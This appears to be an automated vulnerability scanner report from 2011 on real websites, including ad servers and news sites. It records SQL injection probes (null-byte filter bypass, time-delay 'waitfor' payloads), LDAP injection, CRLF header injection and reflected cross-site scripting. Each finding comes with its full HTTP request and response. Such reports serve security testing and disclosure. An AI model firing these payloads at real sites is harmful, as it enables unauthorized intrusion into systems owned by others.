The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 22:31:57 GMT Server: Omniture DC/2.0.0 Content-Length: 451 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/ranhcorporate,ranhrollup/1/H.17/s7257423425526 ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 22:29:42 GMT Server: Omniture DC/2.0.0 Content-Length: 451 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/ranhcorporate,ranhrollup/1/H.17/s7481922958044 ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 22:13:47 GMT Server: Omniture DC/2.0.0 Content-Length: 429 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/ranhcorporate,ranhrollup/1 was not found on thi ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 22:57:40 GMT Server: Omniture DC/2.0.0 Content-Length: 439 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/ranhrollup/1/H.22.1/s75506922125350 was not fo ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 23:02:14 GMT Server: Omniture DC/2.0.0 Content-Length: 439 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/ranhrollup/1/H.22.1/s79787087680306 was not fo ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The PW parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the PW parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<html> <head> <title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'. ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title> ...[SNIP]...
The UN parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the UN parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<html> <head> <title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'. ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title> ...[SNIP]...
The cid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
The cpc parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cpc parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<html> <head> <title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string '0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70'. ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near '0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70'.</title> ...[SNIP]...
The cpid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cpid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The password parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the password parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<html> <head> <title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'. ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title> ...[SNIP]...
The username parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the username parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<html> <head> <title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'. ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title> ...[SNIP]...
The cid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
The cpc parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cpc parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<html> <head> <title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'mCUbki05i2q2gM801Slr08SHaX285EO45'. ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'mCUbki05i2q2gM801Slr08SHaX285EO45'.</title> ...[SNIP]...
The __EVENTARGUMENT parameter appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __EVENTARGUMENT parameter. The application took 25172 milliseconds to respond to the request, compared with 4165 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26C ...[SNIP]...
The _msuuid_787f8z6077 cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the _msuuid_787f8z6077 cookie. The application took 52532 milliseconds to respond to the request, compared with 10937 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26C ...[SNIP]...
The c cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the c cookie. The application took 19936 milliseconds to respond to the request, compared with 2707 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fPromCode%3d571423&PromCode=571423">here</a>.</h2 ...[SNIP]...
The s_id cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the s_id cookie. The application took 53423 milliseconds to respond to the request, compared with 10937 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26C ...[SNIP]...
1.19. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach?taxonomyId=17&1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.computerworld.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=22922409.1116149048.1303476387.1303476387.1303476387.1; __utmz=22922409.1303476387.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __switchTo5x=60; __unam=8eb1eeb-12f7d3f43b2-c1bcf53-1
The pid parameter appears to be vulnerable to LDAP injection attacks.
The payloads 2fda59a1d239f5ba)(sn=* and 2fda59a1d239f5ba)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
The value of the email request parameter submitted to the URL /create-account-submit.do is copied into the HTML document as plain text between tags at the URL //account.do. The payload 2559e<script>alert(1)</script>8523ef6493d was submitted in the email parameter. This input was returned unmodified in a subsequent request for the URL //account.do.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the Location response header. The payload 8d4c5%0d%0a27bb07a4caf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8d4c5%0d%0a27bb07a4caf/new.computerworlduk.com/security1;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;tile=2;ord=1303854538291? HTTP/1.1 Host: ad.uk.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of REST URL parameter 1 is copied into the Location response header. The payload 95a76%0d%0a26ff575b102 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /95a76%0d%0a26ff575b102/new.computerworlduk.com/security2;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;tile=3;ord=1303854538291? HTTP/1.1 Host: ad.uk.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the callback request parameter is copied into the Location response header. The payload 8079d%0d%0a98a5ae34c96 was submitted in the callback parameter. This caused a response containing an injected HTTP header.
Request
GET /syndication/get_widget.js?callback=8079d%0d%0a98a5ae34c96&output=json&location=http%3A%2F%2Fwww.aac.org%2Fsite%2FTR%2FEvents%2FAWB08%3Fpg%3Dteam%26fr_id%3D1110%26team_id%3D24880×tamp=1303854282405&appId.0=9dc88731-b2ec-4909-9bc6-b15b8881219b HTTP/1.1 Host: widgetserver.com Proxy-Connection: keep-alive Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 26 Apr 2011 21:44:34 GMT Server: Apache/2.2.3 (Red Hat) Location: http://cdn.widgetserver.com/syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/?callback=8079d 98a5ae34c96 Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: application/x-javascript Content-Length: 0
The value of the callback request parameter is copied into the Location response header. The payload a292f%0d%0ad3fe71315d0 was submitted in the callback parameter. This caused a response containing an injected HTTP header.
Request
GET /syndication/get_widget.js?callback=a292f%0d%0ad3fe71315d0&output=json&location=http%3A%2F%2Fwww.widgetbox.com%2Flist%2Fmost_popular×tamp=1303854385556&appId.0=077f25c8-0348-4215-9539-57b2ff17f13b HTTP/1.1 Host: www.widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 26 Apr 2011 21:46:18 GMT Server: Apache/2.2.3 (Red Hat) Location: http://cdn.widgetserver.com/syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/?callback=a292f d3fe71315d0 Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: application/x-javascript Content-Length: 0
5. Cross-site scripting (reflected)previousnext There are 266 instances of this issue:
The value of the labels request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 139d0"-alert(1)-"6aa7e702a5c was submitted in the labels parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb139d0"-alert(1)-"6aa7e702a5c&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... /click%3Bh%3Dv8/3af5/f/163/%2a/f%3B240320616%3B0-0%3B0%3B62289812%3B3454-728/90%3B41844250/41862037/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb139d0"-alert(1)-"6aa7e702a5c&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE ...[SNIP]...
The value of the redirecturl2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db356"-alert(1)-"f49aabc7bfe was submitted in the redirecturl2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=db356"-alert(1)-"f49aabc7bfe HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... TX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=db356"-alert(1)-"f49aabc7bfehttp://www.metropcs.com/cell-phone-plans"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the rtbdata2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f143"-alert(1)-"667d895dc3f was submitted in the rtbdata2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg4f143"-alert(1)-"667d895dc3f&redirecturl2=;ord=98489? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... AUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg4f143"-alert(1)-"667d895dc3f&redirecturl2=http%3a%2f%2fwww.metropcs.com/android%3Futm_source%3DDART%26utm_medium%3DDisplay%252BMedia%26utm_campaign%3DMPCS%252BGM%252BQ2%252BInterim%252B%285403001%29"); var fscUrl = url; var fsc ...[SNIP]...
The value of the rtbip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cdb3"-alert(1)-"210cce18065 was submitted in the rtbip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.1467cdb3"-alert(1)-"210cce18065&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... /f/163/%2a/r%3B240320616%3B1-0%3B0%3B62289812%3B3454-728/90%3B41885373/41903160/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.1467cdb3"-alert(1)-"210cce18065&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQG ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c32f1"-alert(1)-"34398203435 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1lsc32f1"-alert(1)-"34398203435&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
